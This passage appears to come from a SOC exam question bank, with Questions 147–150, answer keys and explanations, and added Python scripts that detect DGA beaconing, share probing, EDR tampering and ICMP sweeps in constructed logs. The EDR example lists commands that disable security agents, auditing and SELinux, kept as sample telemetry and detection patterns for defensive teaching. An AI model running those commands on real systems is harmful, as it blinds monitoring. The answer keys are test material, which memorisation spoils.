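    """One alert per internal source that used Telnet/RDP toward >= min_destinations
    external, non-sanctioned hosts with at least one attempt outside business hours."""
    by_source = defaultdict(lambda: {"dests": set(), "services": set(), "off_hours": 0,
                                     "unanswered": 0, "first": None, "last": None})
    for rec in parse_zeek_conn(conn_log):
        port = int(rec["id.resp_p"])
        dst = rec["id.resp_h"]
        if port not in LEGACY_REMOTE_PORTS or not is_external(dst) or is_sanctioned(dst):
            continue
        ts = datetime.fromtimestamp(float(rec["ts"]), tz=timezone.utc)
        s = by_source[rec["id.orig_h"]]
        s["dests"].add(dst)
        s["services"].add(LEGACY_REMOTE_PORTS[port])
        s["off_hours"] += is_off_hours(ts)
        s["unanswered"] += rec["conn_state"] == "S0"     # SYN sent, nothing back: probing/beaconing
        s["first"] = ts if s["first"] is None else min(s["first"], ts)
        s["last"] = ts if s["last"] is None else max(s["last"], ts)
    alerts = []
    for src, s in by_source.items():
        if s["off_hours"] and len(s["dests"]) >= min_destinations:
            alerts.append({
                "source": src, "services": sorted(s["services"]),
                "distinct_destinations": len(s["dests"]), "destinations": sorted(s["dests"]),
                "off_hours_events": s["off_hours"], "unanswered": s["unanswered"],
                "window": (s["first"].isoformat(), s["last"].isoformat()),
                "action": "isolate host; capture full packets; collect cron/systemd timers, "
                          "shell history and the invoking script before any reboot",
            })
    return alerts


def _ts(*args):
    return f"{datetime(*args, tzinfo=timezone.utc).timestamp():.6f}"


# Constructed sample (not real traffic); 203.0.113.0/24 and 198.51.100.0/24 are
# RFC 5737 documentation ranges standing in for unknown external addresses.
_ROWS = [
    # ts, uid, orig_h, orig_p, resp_h, resp_p, proto, service, conn_state
    (_ts(2024, 5, 15, 2, 13), "CAbc1", "10.1.4.22", "51022", "203.0.113.5", "23", "tcp", "-", "S0"),
    (_ts(2024, 5, 15, 2, 18), "CAbc2", "10.1.4.22", "51030", "198.51.100.7", "23", "tcp", "-", "SF"),
    (_ts(2024, 5, 15, 2, 41), "CAbc3", "10.1.4.22", "51044", "203.0.113.5", "443", "tcp", "ssl", "SF"),
    (_ts(2024, 5, 15, 10, 0), "CAbc4", "10.1.4.22", "51101", "192.0.2.10", "23", "tcp", "-", "SF"),
    (_ts(2024, 5, 15, 3, 5), "CAbc5", "10.1.7.31", "49912", "198.51.100.20", "3389", "tcp", "-", "S0"),
    (_ts(2024, 5, 15, 3, 7), "CAbc6", "10.1.7.31", "49913", "198.51.100.21", "3389", "tcp", "-", "S0"),
    (_ts(2024, 5, 15, 14, 0), "CAbc7", "10.1.7.31", "50200", "10.1.7.40", "3389", "tcp", "-", "SF"),
]
SAMPLE_CONN_LOG = (
    "#separator \\x09\n"
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tconn_state\n"
    + "\n".join("\t".join(r) for r in _ROWS) + "\n"
)

if __name__ == "__main__":
    for alert in find_legacy_remote_access(SAMPLE_CONN_LOG):
        print(alert["source"], alert["services"], alert["destinations"], alert["window"])
```

The sanctioned-range check is what keeps the rule from paging on the one place Telnet is still expected, and the S0 count is worth surfacing because a script cycling through dead destinations looks exactly like the "repeatedly attempting to connect" wording of Q136. Lateral RDP inside the network (the last sample row) is deliberately out of scope here; it needs a separate rule keyed on source role rather than on external destinations.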
Question 147
A SOC analyst identifies Linux endpoints generating low-volume HTTPS requests to newly registered domains with high-entropy subdomains during off-hours. The activity originates from undocumented scripts. What is the most likely threat, and what is the SOC’s first response?
A) Normal telemetry; allow traffic.
B) Malware using dynamically generated domains for command-and-control; isolate endpoints, capture traffic, and analyze scripts.
C) Misconfigured web services; update configuration.
D) User testing; verify with IT.
Answer: B)
Explanation:
Option A assumes normal telemetry. Legitimate telemetry occurs at scheduled intervals, uses known domains, and originates from approved processes. Low-volume, continuous HTTPS requests to newly registered high-entropy subdomains outside business hours are anomalous. Allowing this traffic could enable malware to maintain command-and-control channels, exfiltrate data, and persist undetected. Telemetry does not use dynamically generated subdomains or hold continuous off-hours connections.
Option B is correct. Malware commonly uses dynamically generated domains for covert command-and-control communication. Indicators include low-volume persistent traffic, high-entropy dynamic subdomains, off-hours activity, and execution by undocumented scripts. Immediate SOC response involves isolating affected endpoints, capturing network traffic for analysis, and performing endpoint forensics to identify malicious scripts and infrastructure. Threat intelligence can help identify malicious domains. Remediation includes cleaning endpoints, updating detection rules for anomalous DNS or HTTPS activity, and monitoring for similar behavior. Preserving forensic evidence ensures regulatory compliance, supports post-incident investigation, and improves threat intelligence. Ignoring the activity allows malware to persist and potentially exfiltrate sensitive data undetected.
Option C assumes misconfigured web services. Misconfigurations result in predictable errors or isolated failures and do not explain persistent high-entropy traffic from unknown scripts. Treating this as benign risks undetected malware operations.
Option D assumes user testing. Testing is scheduled, documented, and predictable. Off-hours, undocumented scripts generating continuous high-entropy requests are inconsistent with legitimate testing. Misclassification allows malware to evade detection.
Selecting option B ensures containment, forensic analysis, and remediation while protecting network integrity and sensitive information.
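As an added example (not part of the original question set), the following Python script turns the indicators listed above into a detection: it scores the leftmost DNS label for Shannon entropy, checks the parent domain's registration age, notes off-hours timing, and counts how many distinct generated labels a source contacted under one parent domain. The log lines, the .example domain names and the registration dates are constructed for the example; the two-label registrable-domain rule is a simplifying assumption, and real code should consult the Public Suffix List.

```python
import math
from collections import Counter, defaultdict
from datetime import datetime

# Constructed proxy/TLS-SNI log lines: timestamp, source endpoint, requested host.
# Made-up sample input; the .example domains are fictional.
SAMPLE_LOG = """\
2024-03-12T02:14:07Z lnx-web-03 x7q9zk2pf8.trendly-updates.example
2024-03-12T02:19:11Z lnx-web-03 ab83kqz1mm.trendly-updates.example
2024-03-12T02:24:02Z lnx-web-03 q0pw3zd7vx.trendly-updates.example
2024-03-12T03:01:15Z lnx-web-03 updates.trendly-updates.example
2024-03-12T09:30:00Z lnx-web-01 telemetry.corp-monitoring.example
2024-03-12T10:05:44Z lnx-web-02 api.vendor-cdn.example
"""

# Assumed registration dates, as a WHOIS or passive-DNS enrichment would return
# them. Constructed values; a domain missing from the table is treated as unknown.
REGISTRATION_DATE = {
    "trendly-updates.example": datetime(2024, 3, 9),
    "corp-monitoring.example": datetime(2015, 6, 1),
    "vendor-cdn.example": datetime(2018, 2, 14),
}

ANALYSIS_TIME = datetime(2024, 3, 12)  # "now" for the constructed data


def shannon_entropy(label):
    """Bits of entropy per character of a DNS label."""
    counts = Counter(label)
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_domain(host):
    # Assumption: the last two labels form the registrable domain. Production code
    # should use the Public Suffix List (co.uk and similar break this rule).
    return ".".join(host.split(".")[-2:])


def is_off_hours(ts, start_hour=7, end_hour=19):
    return not (start_hour <= ts.hour < end_hour)


def analyze(log_text, now, nrd_days=30, entropy_threshold=3.0, min_label_len=8):
    """Flag requests whose leftmost label looks algorithmically generated and
    whose parent domain is newly registered (or has no registration record)."""
    findings = []
    for line in log_text.splitlines():
        ts_text, src, host = line.split()
        ts = datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ")
        label = host.split(".")[0]
        parent = registrable_domain(host)
        registered = REGISTRATION_DATE.get(parent)
        reasons = []
        if registered is None or (now - registered).days < nrd_days:
            reasons.append("newly-registered-or-unknown")
        if len(label) >= min_label_len and shannon_entropy(label) >= entropy_threshold:
            reasons.append("high-entropy-label")
        if is_off_hours(ts):
            reasons.append("off-hours")
        # Either indicator alone is noisy (CDN hashes, a vendor's new domain);
        # require both before raising a finding. Off-hours raises priority only.
        if "high-entropy-label" in reasons and "newly-registered-or-unknown" in reasons:
            findings.append({"src": src, "host": host, "parent": parent, "reasons": reasons})
    return findings


def summarize(findings):
    """Distinct generated labels per (source, parent domain): a DGA produces many."""
    hosts = defaultdict(set)
    for f in findings:
        hosts[(f["src"], f["parent"])].add(f["host"])
    return {key: len(names) for key, names in hosts.items()}


def run_sample():
    return analyze(SAMPLE_LOG, now=ANALYSIS_TIME)


if __name__ == "__main__":
    hits = run_sample()
    for f in hits:
        print(f["src"], f["host"], ",".join(f["reasons"]))
    print(summarize(hits))
```

Only lnx-web-03 is reported: its three ten-character labels each score above 3 bits per character under a domain registered three days earlier, while "updates" under the same domain and the long-registered telemetry and API hosts are not flagged. The per-source summary is what you would use to pick which endpoints to isolate first and to seed a SIEM rule for the same parent domain across the fleet.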
Question 148
A SOC analyst observes endpoints repeatedly attempting unauthorized access to sensitive file shares during off-hours. Unknown processes target multiple accounts across several systems. What is the most likely threat, and what is the SOC’s first response?
A) Routine backup or maintenance; allow activity.
B) Malware performing lateral movement or reconnaissance; isolate endpoints, review logs, and perform endpoint analysis.
C) Misconfigured file permissions; update configuration.
D) Legitimate off-hours testing; notify users.
Answer: B)
Explanation:
Option A assumes routine backup or maintenance. Backup activity is predictable, scheduled, and uses authorized accounts. Repeated unauthorized access by unknown processes is anomalous. Ignoring this activity could allow malware to map the network, perform lateral movement, and exfiltrate sensitive information. Routine backups do not trigger multi-account unauthorized access attempts.
Option B is correct. Malware often probes file shares for reconnaissance, lateral movement, or exfiltration. Indicators include off-hours activity, repeated failed or unauthorized access attempts, multi-account targeting, and execution by undocumented processes. Immediate SOC response involves isolating affected endpoints, reviewing file access logs, and performing endpoint forensics to identify malicious processes. Correlating events across SIEM data can reveal additional impacted accounts and systems. Remediation includes cleaning endpoints, strengthening access controls, updating monitoring rules, and validating account integrity. Preserving forensic evidence supports regulatory compliance, post-incident investigation, and threat intelligence. Failing to respond could result in persistent unauthorized access, lateral movement, and potential data exfiltration.
Option C assumes misconfigured file permissions. Misconfigurations usually generate isolated access errors and do not explain repeated multi-account off-hours attempts. Treating this as benign allows malware to persist.
Option D assumes legitimate testing. Testing is scheduled, documented, and predictable. Off-hours repeated unauthorized access by unknown processes is inconsistent with testing and indicates malicious activity. Misclassification could allow malware to maintain persistence and compromise data.
Selecting option B ensures immediate containment, forensic analysis, and remediation while protecting file share integrity and preventing lateral movement.
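As an added example (not from the original question set), the following Python script shows the log review described in Option B: it groups access-denied events on file shares by source host and raises a finding when one host tries several accounts against several servers inside a short window, which is the fan-out of lateral-movement reconnaissance rather than one user mistyping a password. The audit records, host names, account names and share names are constructed for the example; the field layout is an assumption and would need adapting to the real log source (Windows 5140/5145 events, Samba audit logs and so on).

```python
from collections import defaultdict
from datetime import datetime

# Constructed file-share audit records: timestamp, source host, account used,
# target file server, share name, outcome. Made-up sample input.
SAMPLE_EVENTS = """\
2024-03-12T01:02:10Z ws-114 j.doe fs01 finance DENIED
2024-03-12T01:03:41Z ws-114 svc-backup fs01 finance DENIED
2024-03-12T01:05:05Z ws-114 m.lee fs02 hr DENIED
2024-03-12T01:07:22Z ws-114 admin-old fs02 hr DENIED
2024-03-12T01:09:58Z ws-114 j.doe fs03 legal DENIED
2024-03-12T02:00:00Z backup-01 svc-backup fs01 finance ALLOWED
2024-03-12T02:00:30Z backup-01 svc-backup fs02 hr ALLOWED
2024-03-12T14:05:13Z ws-007 k.ng fs01 finance DENIED
"""


def parse_events(text):
    events = []
    for line in text.splitlines():
        ts, src, account, server, share, outcome = line.split()
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "src": src, "account": account, "server": server,
            "share": share, "outcome": outcome,
        })
    return events


def is_off_hours(ts, start_hour=7, end_hour=19):
    return not (start_hour <= ts.hour < end_hour)


def detect_share_probing(events, min_accounts=3, min_servers=2, window_minutes=30):
    """One source host cycling through several accounts against several servers
    in a short window is reconnaissance; a scheduled backup uses one authorized
    account and is allowed, so it never enters the denied set."""
    denied_by_src = defaultdict(list)
    for e in events:
        if e["outcome"] == "DENIED":
            denied_by_src[e["src"]].append(e)

    findings = {}
    for src, denied in denied_by_src.items():
        denied.sort(key=lambda e: e["ts"])
        for i, first in enumerate(denied):
            window = [e for e in denied[i:]
                      if (e["ts"] - first["ts"]).total_seconds() <= window_minutes * 60]
            accounts = {e["account"] for e in window}
            servers = {e["server"] for e in window}
            if len(accounts) >= min_accounts and len(servers) >= min_servers:
                findings[src] = {
                    "accounts_to_validate": sorted(accounts),
                    "servers": sorted(servers),
                    "shares": sorted({e["share"] for e in window}),
                    "off_hours": all(is_off_hours(e["ts"]) for e in window),
                    "first_seen": first["ts"].isoformat(),
                }
                break  # one finding per source is enough to trigger isolation
    return findings


def run_sample():
    return detect_share_probing(parse_events(SAMPLE_EVENTS))


if __name__ == "__main__":
    for src, detail in run_sample().items():
        print(src, detail)
```

The result names the host to isolate (ws-114), the servers whose access logs to pull, and the list of accounts whose integrity must be validated, which is the remediation step the explanation calls for. The single daytime denial from ws-007 and the allowed off-hours backup from backup-01 produce no finding.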
Question 149
A SOC analyst observes endpoints executing scripts that attempt to disable endpoint detection and response (EDR) software and connect to unknown external IPs during off-hours. The scripts run with elevated privileges. What is the most likely threat, and what should the SOC do first?
A) Routine administrative scripts; allow execution.
B) Malware attempting to bypass security controls and establish persistence; isolate endpoints, capture memory, and analyze scripts.
C) Misconfigured EDR policies; update configuration.
D) User testing; notify users.
Answer: B)
Explanation:
Option A assumes routine administrative scripts. Legitimate administration is scheduled, documented, and uses approved tools. Scripts that disable EDR, run with elevated privileges, and contact unknown IPs are anomalous. Ignoring this activity risks persistent malware, evasion of security monitoring, and data compromise.
Option B is correct. Malware often attempts to disable endpoint security to evade detection and maintain persistence. Indicators include elevated privilege execution, off-hours activity, unknown scripts, and communication with unknown external IPs. Immediate SOC response involves isolating affected endpoints from the network, capturing memory while the system is still running (a reboot or shutdown destroys volatile evidence such as injected code and live network connections), collecting logs, and analyzing the scripts to determine malware behavior and potential command-and-control channels. Remediation includes cleaning endpoints, restoring EDR functionality, updating detection rules, and monitoring for similar activity. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and informs threat intelligence. Ignoring this activity allows malware to persist, exfiltrate data, and compromise additional endpoints.
Option C assumes that unusual activity involving elevated scripts bypassing endpoint detection and response (EDR) protections is caused by misconfigured EDR policies. While EDR misconfigurations can occur—such as overly permissive rules, incorrect agent deployment, or misapplied exclusions—these typically result in predictable outcomes, such as alerts being missed, certain applications being allowed to run, or minor gaps in coverage. Misconfigured policies usually do not explain the execution of elevated scripts that actively bypass security protections, modify system configurations, or communicate with external hosts in an unauthorized manner. Such behavior is deliberate, controlled, and outside the scope of what standard misconfigurations would produce. Misclassifying this activity as benign can leave a system vulnerable to undetected compromise, allowing attackers or malware to persist on endpoints while avoiding detection mechanisms.
EDR solutions are specifically designed to monitor and prevent unauthorized execution, privilege escalation, and malicious network communications. When a script elevates privileges, disables security controls, or establishes external communications despite EDR protections, it demonstrates behavior inconsistent with standard misconfigurations. This type of activity is a strong indicator of malicious intent, often associated with advanced persistent threats, ransomware, or other sophisticated malware. Attackers may use obfuscated scripts, code injection, or other evasion techniques to bypass security controls, allowing them to operate stealthily and maintain persistence across the network. Treating these incidents as configuration errors rather than as potential compromise enables continued unauthorized access, data exfiltration, or preparation for additional attacks.
Option D assumes that off-hours activity, such as the execution of unauthorized scripts, can be attributed to legitimate user testing. In enterprise environments, testing is normally scheduled, documented, and executed in a controlled manner. Legitimate testing follows predefined procedures, occurs at approved times, and impacts only authorized endpoints or applications. Off-hours execution of unauthorized scripts that interact with security software—particularly scripts designed to disable protections, alter configurations, or communicate externally—is highly inconsistent with routine testing practices. Such activity cannot be justified as part of a legitimate test, as it bypasses established policies and represents a significant deviation from predictable, documented behavior.
Misclassifying this type of activity as legitimate testing carries serious security risks. Malware or attackers frequently mimic routine operations, running scripts during periods of low monitoring to evade detection. These scripts can disable endpoint protections, install backdoors, collect credentials, or prepare the environment for further compromise. By assuming off-hours script execution is benign, organizations risk allowing persistent malware to remain undetected, giving attackers the ability to maintain access, propagate laterally, and compromise additional systems. The longer such activity goes uninvestigated, the greater the potential damage, including data exfiltration, system downtime, or full-scale network compromise.
Effective response requires verification, investigation, and correlation of anomalous activity with documented operational practices. Security teams must examine logs, network communications, and endpoint processes to determine whether scripts were authorized and whether EDR protections were bypassed intentionally or maliciously. Behavioral baselines and threat intelligence can help distinguish legitimate administrative actions from malicious activity.
While misconfigured EDR policies or routine user testing could explain minor anomalies, neither scenario accounts for the off-hours execution of elevated, unauthorized scripts affecting security software and communicating externally. These behaviors are inconsistent with benign misconfigurations or legitimate testing and strongly indicate malicious intent. Treating such activity as harmless risks persistent malware operations, lateral movement, and further compromise. Verification, monitoring, and timely remediation are essential to identify unauthorized activity, protect endpoints, and maintain the integrity of network security.
Selecting option B ensures immediate containment, forensic analysis, and remediation while maintaining endpoint security.
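As an added example (not from the original question set), the following Python script demonstrates the correlation behind Option B on Linux process and connection telemetry: it classifies commands that stop or mask a security service, disable auditing, or set SELinux permissive, records the effective UID they ran under, and pairs each one with outbound connections from the same host to non-RFC1918 addresses within a short window. The telemetry lines, host names and the "edr-agent" service name are constructed for the example; the record layout is an assumption (real auditd SYSCALL/EXECVE records or EDR process events carry the same fields in a different shape), and the documentation address 203.0.113.45 stands in for an unknown external peer.

```python
import re
from datetime import datetime
from ipaddress import ip_address, ip_network

# Constructed process and connection telemetry, one record per line:
# timestamp|host|effective uid|kind|detail. EXEC detail is the command line,
# CONNECT detail is destination ip:port. Made-up sample input.
SAMPLE_TELEMETRY = """\
2024-03-12T02:10:03Z|lnx-db-07|0|EXEC|systemctl stop edr-agent
2024-03-12T02:10:05Z|lnx-db-07|0|EXEC|auditctl -e 0
2024-03-12T02:10:09Z|lnx-db-07|0|EXEC|setenforce 0
2024-03-12T02:12:40Z|lnx-db-07|0|CONNECT|203.0.113.45:8443
2024-03-12T14:00:11Z|lnx-build-02|0|EXEC|systemctl restart nginx
2024-03-12T14:01:30Z|lnx-build-02|1000|EXEC|systemctl stop edr-agent
2024-03-12T14:02:00Z|lnx-build-02|1000|CONNECT|10.20.0.5:443
"""

# Assumed unit/process names of the security agents; substitute the real ones.
SECURITY_SERVICES = {"edr-agent", "edr-agent.service", "auditd", "auditd.service"}
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# (pattern, category, whether group(1) must name a security service to count)
TAMPER_PATTERNS = [
    (re.compile(r"^systemctl\s+(?:stop|disable|mask)\s+(\S+)"), "service-stop", True),
    (re.compile(r"^(?:pkill|killall)\s+(?:-\S+\s+)*(\S+)"), "process-kill", True),
    (re.compile(r"^auditctl\s+-e\s+0\b"), "audit-disable", False),
    (re.compile(r"^setenforce\s+0\b"), "selinux-permissive", False),
]


def classify_tamper(cmdline):
    """Return a tamper category if the command disables a security control, else None."""
    for pattern, category, needs_target in TAMPER_PATTERNS:
        m = pattern.match(cmdline)
        if not m:
            continue
        if needs_target and m.group(1) not in SECURITY_SERVICES:
            return None  # stopping nginx is administration, not tampering
        return category
    return None


def is_internal(ip_text):
    ip = ip_address(ip_text)
    return any(ip in net for net in INTERNAL_NETS)


def parse_telemetry(text):
    records = []
    for line in text.splitlines():
        ts, host, euid, kind, detail = line.split("|", 4)
        records.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                        "host": host, "euid": int(euid), "kind": kind, "detail": detail})
    return records


def detect_edr_tampering(records, window_minutes=10):
    """Pair each tamper command with external connections from the same host in
    the following minutes. Root + tamper + new external peer is the high-severity
    case; an unprivileged attempt with no follow-up still deserves a look."""
    connects = [r for r in records if r["kind"] == "CONNECT"]
    findings = []
    for r in records:
        if r["kind"] != "EXEC":
            continue
        category = classify_tamper(r["detail"])
        if category is None:
            continue
        followups = sorted(
            c["detail"] for c in connects
            if c["host"] == r["host"]
            and 0 <= (c["ts"] - r["ts"]).total_seconds() <= window_minutes * 60
            and not is_internal(c["detail"].rsplit(":", 1)[0])
        )
        severity = "high" if r["euid"] == 0 and followups else "medium"
        findings.append({"host": r["host"], "ts": r["ts"].isoformat(),
                         "command": r["detail"], "category": category,
                         "euid": r["euid"], "external_peers": followups,
                         "severity": severity})
    return findings


def run_sample():
    return detect_edr_tampering(parse_telemetry(SAMPLE_TELEMETRY))


if __name__ == "__main__":
    for f in run_sample():
        print(f["severity"], f["host"], f["command"], f["external_peers"])
```

lnx-db-07 produces three high-severity findings (root, three controls disabled, then a connection to an unknown external peer); lnx-build-02 produces one medium finding for an unprivileged stop attempt with only an internal connection afterwards, and the nginx restart is ignored. The high-severity hosts are the ones to isolate and memory-capture first; the external peer list feeds the traffic capture and threat-intelligence lookup.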
Question 150
A SOC analyst observes Linux endpoints performing repeated low-volume ICMP requests to unknown external IPs during off-hours. The traffic originates from undocumented scripts. What is the most likely threat, and what should the SOC do first?
A) Routine network monitoring; allow traffic.
B) Malware performing reconnaissance or preparing for denial-of-service; isolate endpoints, capture traffic, and analyze scripts.
C) Misconfigured ICMP settings; update configuration.
D) User network testing; notify users.
Answer: B)
Explanation:
Option A assumes routine network monitoring. Legitimate ICMP traffic comes from authorized monitoring tools, follows predictable schedules, and targets known hosts. Off-hours low-volume ICMP requests to unknown external IPs from undocumented scripts are anomalous. Allowing this activity risks malware performing network reconnaissance, mapping external networks, or preparing for denial-of-service attacks. Routine monitoring does not generate off-hours anomalous ICMP traffic.
Option B is correct. Malware often uses ICMP for reconnaissance or network mapping. Indicators include off-hours activity, repeated ICMP requests to unknown IPs, low-volume but continuous traffic, and execution by undocumented scripts. Immediate SOC response involves isolating affected endpoints, capturing network traffic for analysis, and performing process forensics to identify malicious activity. Correlation with threat intelligence can help identify potential attacker infrastructure. Remediation includes cleaning endpoints, updating detection rules for anomalous ICMP traffic, and monitoring network segments for similar behavior. Preserving forensic evidence ensures regulatory compliance, supports incident investigation, and improves threat intelligence. Ignoring the activity could allow malware to gain situational awareness, plan further attacks, and compromise network assets.
Option C assumes that unusual off-hours ICMP activity is caused by misconfigured ICMP settings on network devices or hosts. While misconfigurations of ICMP are not uncommon—such as improperly set firewall rules, disabled or misrouted ping responses, or incorrect rate-limiting—these issues generally result in predictable and easily identifiable patterns. For instance, misconfigured ICMP settings may produce occasional unreachable messages, packet loss, or error logs when pings fail or exceed configured thresholds. These behaviors are usually isolated, affecting specific devices or subnets, and are limited in scope. They do not typically explain repeated or sustained activity occurring outside normal operational hours.
In contrast, repeated off-hours ICMP traffic may indicate more deliberate behavior, such as reconnaissance or the preparation for a larger attack. ICMP is often used by attackers to map networks, verify host availability, or probe firewall and security configurations. Persistent ICMP queries during periods of low monitoring, like nights or weekends, can allow malicious actors to collect information about system topology, active hosts, and potential targets while avoiding detection. Treating such activity as a benign misconfiguration can allow an attacker to continue reconnaissance undetected, potentially laying the groundwork for more significant compromises, such as lateral movement, privilege escalation, or malware deployment. Misclassification based on the assumption of misconfiguration ignores the context of timing, frequency, and potential intent, leaving a window of opportunity for adversaries to exploit the network.
Option D assumes that off-hours ICMP traffic originates from legitimate user network testing. In practice, network testing is generally scheduled, documented, and executed in a controlled manner. Testing activities are predictable, involve known endpoints, and are often part of routine maintenance or network troubleshooting procedures. They do not typically generate low-volume, repeated ICMP traffic from undocumented scripts or unknown accounts, nor do they occur at unscheduled off-hours without administrative oversight. Off-hours ICMP traffic generated from scripts that are not documented and not approved is inconsistent with legitimate testing practices. Such behavior can indicate the presence of malware or unauthorized automation performing network scanning, probing, or monitoring to evade detection while establishing persistence.
Misclassifying this activity as legitimate testing presents significant security risks. Malicious actors often mimic benign behaviors, such as ICMP requests, to blend in with normal network traffic. Low-volume, persistent ICMP probes are a common tactic used by malware and advanced persistent threats (APTs) to silently gather information, identify vulnerabilities, and maintain stealthy communication with compromised systems. By assuming that off-hours ICMP activity is routine testing, organizations may fail to investigate these anomalies, allowing attackers to operate unobserved, escalate access privileges, or move laterally across the network. Over time, this can result in broader compromise, sensitive data exposure, and a higher difficulty in containment and remediation.
Effective response requires verification and investigation. Security teams must analyze ICMP traffic patterns, correlate activity with documented testing or maintenance schedules, and identify endpoints generating off-hours requests. Anomaly detection and network monitoring tools can help determine whether traffic volumes, timing, and destination hosts are consistent with authorized testing or indicative of malicious reconnaissance. Forensic inspection of endpoints and scripts generating ICMP requests may also reveal unauthorized or obfuscated code, confirming potential malware presence.
While misconfigured ICMP settings or legitimate network testing can explain certain anomalies, neither scenario accounts for repeated off-hours, low-volume ICMP traffic originating from undocumented scripts or unknown endpoints. Such activity is inconsistent with benign misconfigurations or scheduled testing and is more indicative of reconnaissance, malware persistence, or preparation for further attacks. Treating this activity as harmless leaves a critical window for compromise, enabling attackers to operate undetected, escalate privileges, and exfiltrate information. Verification, monitoring, and targeted investigation are essential to distinguish benign operations from malicious behavior, ensuring timely detection, mitigation, and protection of organizational networks.
Selecting option B ensures immediate containment, forensic analysis, and remediation while preventing network reconnaissance or further attacks.
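As an added example (not from the original question set), the following Python script shows the traffic analysis Option B calls for, applied to flow records of outbound ICMP echo requests: it discards internal destinations and, per source host, counts distinct external targets (a sweep), measures how regular the inter-request gaps are (a timer-driven script has near-zero jitter, a human does not), and checks whether everything happened off-hours. The flow lines, host names and timings are constructed for the example; the 203.0.113.0/24 and 198.51.100.0/24 documentation ranges stand in for unknown external addresses, and the thresholds are assumptions to tune against your own baseline.

```python
import statistics
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address, ip_network

# Constructed flow records: timestamp, source endpoint, destination IP, protocol,
# ICMP type. Made-up sample input.
SAMPLE_FLOWS = """\
2024-03-12T02:00:00Z lnx-app-05 203.0.113.10 icmp echo-request
2024-03-12T02:05:00Z lnx-app-05 203.0.113.11 icmp echo-request
2024-03-12T02:10:00Z lnx-app-05 203.0.113.12 icmp echo-request
2024-03-12T02:15:00Z lnx-app-05 198.51.100.7 icmp echo-request
2024-03-12T02:20:00Z lnx-app-05 198.51.100.8 icmp echo-request
2024-03-12T02:25:00Z lnx-app-05 198.51.100.9 icmp echo-request
2024-03-12T09:00:00Z monitor-01 10.0.0.1 icmp echo-request
2024-03-12T09:00:00Z monitor-01 10.0.0.2 icmp echo-request
2024-03-12T09:00:00Z monitor-01 10.0.0.3 icmp echo-request
2024-03-12T11:00:00Z lnx-app-02 203.0.113.99 icmp echo-request
"""

INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_internal(ip_text):
    ip = ip_address(ip_text)
    return any(ip in net for net in INTERNAL_NETS)


def is_off_hours(ts, start_hour=7, end_hour=19):
    return not (start_hour <= ts.hour < end_hour)


def analyze_icmp(text, sweep_threshold=5, beacon_min_count=4, max_jitter=0.2):
    """Group outbound echo requests to external hosts by source and tag each
    source for a destination sweep, machine-regular timing, and off-hours."""
    by_src = defaultdict(list)
    for line in text.splitlines():
        ts_text, src, dst, proto, icmp_type = line.split()
        if proto != "icmp" or icmp_type != "echo-request" or is_internal(dst):
            continue
        by_src[src].append((datetime.strptime(ts_text, "%Y-%m-%dT%H:%M:%SZ"), dst))

    findings = {}
    for src, recs in by_src.items():
        times = sorted(t for t, _ in recs)
        dsts = {d for _, d in recs}
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        # Coefficient of variation of the gap between requests: ~0 means a timer.
        jitter = None
        if len(gaps) >= 2 and statistics.mean(gaps) > 0:
            jitter = statistics.pstdev(gaps) / statistics.mean(gaps)
        tags = []
        if len(dsts) >= sweep_threshold:
            tags.append("external-sweep")
        if len(recs) >= beacon_min_count and jitter is not None and jitter <= max_jitter:
            tags.append("periodic")
        if all(is_off_hours(t) for t in times):
            tags.append("off-hours")
        # Off-hours alone is not a finding; it only raises the priority of one.
        if "external-sweep" in tags or "periodic" in tags:
            findings[src] = {"tags": tags, "distinct_destinations": len(dsts),
                             "requests": len(recs), "jitter": jitter,
                             "first": times[0].isoformat(), "last": times[-1].isoformat()}
    return findings


def run_sample():
    return analyze_icmp(SAMPLE_FLOWS)


if __name__ == "__main__":
    for src, detail in run_sample().items():
        print(src, detail)
```

Only lnx-app-05 is reported, with all three tags: six distinct external targets, requests exactly five minutes apart, all between 02:00 and 02:30. The internal pings from monitor-01 never enter the analysis, and the single daytime request from lnx-app-02 is below every threshold. The same jitter measure applies to an ICMP tunnel that keeps hitting one destination, which is why "periodic" is scored independently of the sweep count.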